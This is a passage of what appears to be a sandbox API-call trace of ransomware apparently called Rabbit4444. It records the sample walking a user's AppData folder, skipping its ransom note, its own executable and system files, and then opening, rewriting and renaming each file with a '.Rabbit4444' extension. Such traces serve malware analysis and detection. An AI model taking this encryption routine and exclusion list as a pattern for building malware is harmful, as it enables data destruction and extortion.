out: hHeap=0xe0000) returned 1 [0071.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0071.955] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16326546357) returned 1 [0071.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0071.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0071.955] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0071.955] CloseHandle (hObject=0x27c) returned 1 [0071.955] CloseHandle (hObject=0x260) returned 1 [0071.955] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798.Rabbit4444") returned 187 [0071.955] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\43399e8cfdc9ac47fc0bf385b3669ecf51181c3785d40e4dbcdd127b6c51a798.rabbit4444"), dwFlags=0x1) returned 1 [0071.956] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad460d0, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xbad460d0, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xbaec3660, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x20e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f", cAlternateFileName="4841A6~1")) returned 1 [0071.956] lstrcmpiW (lpString1="4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.956] lstrcmpiW (lpString1="4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.956] lstrcmpiW (lpString1="4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f", lpString2="Rabbit4444.exe") returned -1 [0071.956] lstrcmpiW (lpString1="4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f", lpString2=".") returned 1 [0071.956] lstrcmpiW (lpString1="4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f", lpString2="..") returned 1 [0071.956] lstrcmpiW (lpString1="4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f", lpString2="windows") returned -1 [0071.956] lstrcmpiW (lpString1="4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f", lpString2="bootmgr") returned -1 [0071.956] lstrcmpiW (lpString1="4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f", lpString2="pagefile.sys") returned -1 [0071.956] lstrcmpiW (lpString1="4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f", lpString2="boot") returned -1 [0071.956] lstrcmpiW (lpString1="4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f", lpString2="ids.txt") returned -1 [0071.956] lstrcmpiW (lpString1="4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f", lpString2="NTUSER.DAT") returned -1 [0071.956] lstrcpyW (in: lpString1=0x130ec18, lpString2="4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f" | out: lpString1="4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f") returned="4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f" [0071.956] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f", dwFileAttributes=0x0) returned 1 [0071.957] lstrlenW (lpString="4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f") returned 64 [0071.957] lstrlenW (lpString="Rabbit4444") returned 10 [0071.957] lstrcmpiW (lpString1="c5e049b10f", lpString2="Rabbit4444") returned -1 [0071.957] lstrlenW (lpString=".dll") returned 4 [0071.957] lstrcmpiW (lpString1="b10f", lpString2=".dll") returned 1 [0071.957] lstrlenW (lpString=".lnk") returned 4 [0071.957] lstrcmpiW (lpString1="b10f", lpString2=".lnk") returned 1 [0071.957] lstrlenW (lpString=".ini") returned 4 [0071.957] lstrcmpiW (lpString1="b10f", lpString2=".ini") returned 1 [0071.957] lstrlenW (lpString=".sys") returned 4 [0071.957] lstrcmpiW (lpString1="b10f", lpString2=".sys") returned 1 [0071.957] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.957] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.957] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16326825566) returned 1 [0071.958] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=526) returned 1 [0071.958] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0071.958] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0071.958] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x510, lpName=0x0) returned 0x27c [0071.959] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x510) returned 0x80000 [0071.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1104b0 [0071.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0071.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1104b0 | out: hHeap=0xe0000) returned 1 [0071.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0071.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0071.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0071.961] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16327140322) returned 1 [0071.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0071.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0071.961] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0071.961] CloseHandle (hObject=0x27c) returned 1 [0071.961] CloseHandle (hObject=0x260) returned 1 [0071.961] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f.Rabbit4444") returned 187 [0071.961] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\4841a6140b81b4fd8c2d17467c5ae98ba69a83ae10b7b18a863981c5e049b10f.rabbit4444"), dwFlags=0x1) returned 1 [0071.962] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc62d932, ftCreationTime.dwHighDateTime=0x1d32737, ftLastAccessTime.dwLowDateTime=0xdc62d932, ftLastAccessTime.dwHighDateTime=0x1d32737, ftLastWriteTime.dwLowDateTime=0xdec7ab57, ftLastWriteTime.dwHighDateTime=0x1d32737, nFileSizeHigh=0x0, nFileSizeLow=0x7638c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7", cAlternateFileName="48E36E~1")) returned 1 [0071.962] lstrcmpiW (lpString1="48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.962] lstrcmpiW (lpString1="48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.962] lstrcmpiW (lpString1="48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7", lpString2="Rabbit4444.exe") returned -1 [0071.962] lstrcmpiW (lpString1="48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7", lpString2=".") returned 1 [0071.962] lstrcmpiW (lpString1="48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7", lpString2="..") returned 1 [0071.962] lstrcmpiW (lpString1="48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7", lpString2="windows") returned -1 [0071.962] lstrcmpiW (lpString1="48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7", lpString2="bootmgr") returned -1 [0071.962] lstrcmpiW (lpString1="48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7", lpString2="pagefile.sys") returned -1 [0071.962] lstrcmpiW (lpString1="48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7", lpString2="boot") returned -1 [0071.962] lstrcmpiW (lpString1="48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7", lpString2="ids.txt") returned -1 [0071.962] lstrcmpiW (lpString1="48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7", lpString2="NTUSER.DAT") returned -1 [0071.962] lstrcpyW (in: lpString1=0x130ec18, lpString2="48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7" | out: lpString1="48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7") returned="48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7" [0071.962] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7", dwFileAttributes=0x0) returned 1 [0071.964] lstrlenW (lpString="48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7") returned 64 [0071.964] lstrlenW (lpString="Rabbit4444") returned 10 [0071.964] lstrcmpiW (lpString1="2bca0685f7", lpString2="Rabbit4444") returned -1 [0071.964] lstrlenW (lpString=".dll") returned 4 [0071.964] lstrcmpiW (lpString1="85f7", lpString2=".dll") returned 1 [0071.964] lstrlenW (lpString=".lnk") returned 4 [0071.964] lstrcmpiW (lpString1="85f7", lpString2=".lnk") returned 1 [0071.964] lstrlenW (lpString=".ini") returned 4 [0071.964] lstrcmpiW (lpString1="85f7", lpString2=".ini") returned 1 [0071.964] lstrlenW (lpString=".sys") returned 4 [0071.964] lstrcmpiW (lpString1="85f7", lpString2=".sys") returned 1 [0071.964] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.965] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.965] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16327544424) returned 1 [0071.965] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=484236) returned 1 [0071.965] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0071.965] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0071.965] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x76690, lpName=0x0) returned 0x27c [0071.966] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x76690) returned 0x2b0000 [0071.979] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110198 [0071.979] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0071.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110198 | out: hHeap=0xe0000) returned 1 [0071.979] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0071.979] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0071.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0071.979] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16329014786) returned 1 [0071.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0071.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0071.980] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0071.984] CloseHandle (hObject=0x27c) returned 1 [0071.984] CloseHandle (hObject=0x260) returned 1 [0071.984] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7.Rabbit4444") returned 187 [0071.984] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\48e36ea402583c8b7af4fd5638e7fe884397e8541fb6a67229ee1c2bca0685f7.rabbit4444"), dwFlags=0x1) returned 1 [0071.985] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7a74d39, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xb7a74d39, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb806a476, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x43ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311", cAlternateFileName="4A35A1~1")) returned 1 [0071.985] lstrcmpiW (lpString1="4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.985] lstrcmpiW (lpString1="4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.985] lstrcmpiW (lpString1="4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311", lpString2="Rabbit4444.exe") returned -1 [0071.985] lstrcmpiW (lpString1="4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311", lpString2=".") returned 1 [0071.985] lstrcmpiW (lpString1="4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311", lpString2="..") returned 1 [0071.985] lstrcmpiW (lpString1="4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311", lpString2="windows") returned -1 [0071.985] lstrcmpiW (lpString1="4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311", lpString2="bootmgr") returned -1 [0071.985] lstrcmpiW (lpString1="4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311", lpString2="pagefile.sys") returned -1 [0071.985] lstrcmpiW (lpString1="4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311", lpString2="boot") returned -1 [0071.985] lstrcmpiW (lpString1="4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311", lpString2="ids.txt") returned -1 [0071.985] lstrcmpiW (lpString1="4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311", lpString2="NTUSER.DAT") returned -1 [0071.985] lstrcpyW (in: lpString1=0x130ec18, lpString2="4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311" | out: lpString1="4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311") returned="4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311" [0071.985] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311", dwFileAttributes=0x0) returned 1 [0071.986] lstrlenW (lpString="4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311") returned 64 [0071.986] lstrlenW (lpString="Rabbit4444") returned 10 [0071.986] lstrcmpiW (lpString1="9ec700e311", lpString2="Rabbit4444") returned -1 [0071.986] lstrlenW (lpString=".dll") returned 4 [0071.986] lstrcmpiW (lpString1="e311", lpString2=".dll") returned 1 [0071.986] lstrlenW (lpString=".lnk") returned 4 [0071.986] lstrcmpiW (lpString1="e311", lpString2=".lnk") returned 1 [0071.986] lstrlenW (lpString=".ini") returned 4 [0071.986] lstrcmpiW (lpString1="e311", lpString2=".ini") returned 1 [0071.986] lstrlenW (lpString=".sys") returned 4 [0071.986] lstrcmpiW (lpString1="e311", lpString2=".sys") returned 1 [0071.986] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.986] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.986] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16329701350) returned 1 [0071.986] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=17325) returned 1 [0071.986] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0071.986] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0071.986] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x46b0, lpName=0x0) returned 0x27c [0071.988] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x46b0) returned 0x80000 [0071.991] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1107c8 [0071.992] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0071.992] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1107c8 | out: hHeap=0xe0000) returned 1 [0071.994] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0071.997] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.999] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0071.999] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.999] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0071.999] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16330954209) returned 1 [0071.999] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0071.999] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0071.999] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0071.999] CloseHandle (hObject=0x27c) returned 1 [0071.999] CloseHandle (hObject=0x260) returned 1 [0071.999] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311.Rabbit4444") returned 187 [0071.999] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\4a35a161e66f22b369c5112736ad3ca4bd78615f255072df610ae99ec700e311.rabbit4444"), dwFlags=0x1) returned 1 [0072.000] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdea4ddd4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xdea4ddd4, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0xdf19b25c, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x3f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43", cAlternateFileName="4B527F~1")) returned 1 [0072.000] lstrcmpiW (lpString1="4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0072.000] lstrcmpiW (lpString1="4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0072.000] lstrcmpiW (lpString1="4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43", lpString2="Rabbit4444.exe") returned -1 [0072.000] lstrcmpiW (lpString1="4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43", lpString2=".") returned 1 [0072.000] lstrcmpiW (lpString1="4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43", lpString2="..") returned 1 [0072.000] lstrcmpiW (lpString1="4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43", lpString2="windows") returned -1 [0072.000] lstrcmpiW (lpString1="4b527fcfd3d393f17e8b4a86227b42d4d6939d69ca21d501e800c129a2c92a43", lpString2="bootmgr") returned -1 [0072.000] 